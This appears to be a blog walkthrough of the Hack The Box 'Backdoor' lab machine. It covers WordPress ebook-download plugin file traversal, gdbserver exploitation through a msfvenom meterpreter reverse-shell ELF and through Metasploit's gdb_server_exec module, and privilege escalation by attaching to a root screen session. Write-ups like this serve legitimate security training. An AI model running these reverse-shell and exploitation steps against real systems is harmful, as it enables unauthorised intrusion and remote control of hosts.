In this post, I would like to share a walkthrough of the Backdoor Machine from Hack the Box
This room has been considered difficulty rated as an Easy machine on Hack The box
What will you gain from Backdoor machine?
For the user flag, you will use WordPress eBook Directory Traversal and use gdbserver exploit. For gdbserver exploit, i display two methods to get the user shell by manually exploiting and exploit using Metasploit
As for the root flag, you need to use SUID “shell” to get a root shell
Information Gathering on Backdoor Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
From the Nmap output, we only found ports 22 and 80 which leads to http://backdoor.htb
Let’s access the website interface to find any vulnerability that we can exploit
Sadly, we didn’t find anything that we can use for further escalation, but I notice the website has been powered by WordPress
Let’s run wpscan where it will show any vulnerability on WordPress
It will take some time to retrieve the result.
However, we can manually check the WordPress directory
Based on my experience using WordPress, normally there should be something on /wp-content/plugins
As a result of my research on the WordPress interface, we notice there’s an ebook-download directory that we can use in the future.
There’s a blank page when trying to access the filedownload.php file on the website.
Let’s do some research on the ebook-download exploit on the internet
From the result, we have found out that the ebook download is vulnerable to Local File Inclusion (LFI) which we can take advantage of.
We can test the Local File Inclusion by using the Burpsuite tool, but we also can use wfuzz to get an exact directory of the LFI.
We should be moving forward a little bit; we success retrieve one code that shows on gdbserver on port 1337
Step 1: msfvenom modules and
However, we were required to create malicious malware by using the msfvenom command such as msfvenom -p Linux/x64/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<any port> -f elf -o <filename>.elf
Let’s start gdb on our attacker’s machine
Let’s access the machine using port 1337 by executing the command “target extended-remote 10.10.11.125:1337“
Sadly, the connection timed out.
We need to run it for the second time.
Finally, we need to run the following command as below:
remote put <filename>.elf <filename>.elf
set remote exec-file /home/user/<filename>.elf
show remote exec-file
You can start NC listener on your attacker’s machine
For us to retrieve our reverse shell connection back to us, we need to execute the following command
b main
run
Voila! We successfully retrieve the reverse shell connection back to us but we cannot obtain a proper shell
Step 2: Metasploit
I will skip the first step of metasploit usage while i will focusing on the execution of metasploit.
For this activity, we will be using multi/gdb/gdb_server_exec as our exploit from metasploit module
The screenshot above is an example of the settings that we should focus on with the exploit.
However, i almost forgot about the payload of the exploit which we need to execute the command “set payload linux/x64/meterpreter/reverse_tcp before proceeding with the command “run“
At last, we have managed to get a meterpreterr by using those exploits with the configuration shown previously.
By typing the command shell will create channel 1 (metasploit way of shell).
We need to execute the command python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ to obtain an interactive shell
As usual, we can read the user flag by running the “cat user.txt” command
Escalate to Root Privileges Access
We can run the command ps aux so that we can sight the process that runs on the victim’s machine
Uwu! We notice that the screen have been running on the machine as “SCREEN -dmS root“
For those who are not familiar with Screen, it’s a terminal multiplexer which you can start a session with screen and can open any number of virtual terminals within that session.
After reading on GTFOBins website, there are a few commands that we can take advantage of here.
When we execute the command screen -x root,an error such as “Must be connected to a terminal“
The error occurs might be because we didn’t obtain a full proper shell here. For us to obtain a full proper shell here, we should execute the following command before trying again
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
We managed to obtain a root shell on the terminal
As usual, we can read the root flag by running the “cat root.txt” command
-THE END-
Happy Learning Guys!
Extra Information
We can go to /etc/shadow so that we can unlock and read the write-up
No responses yet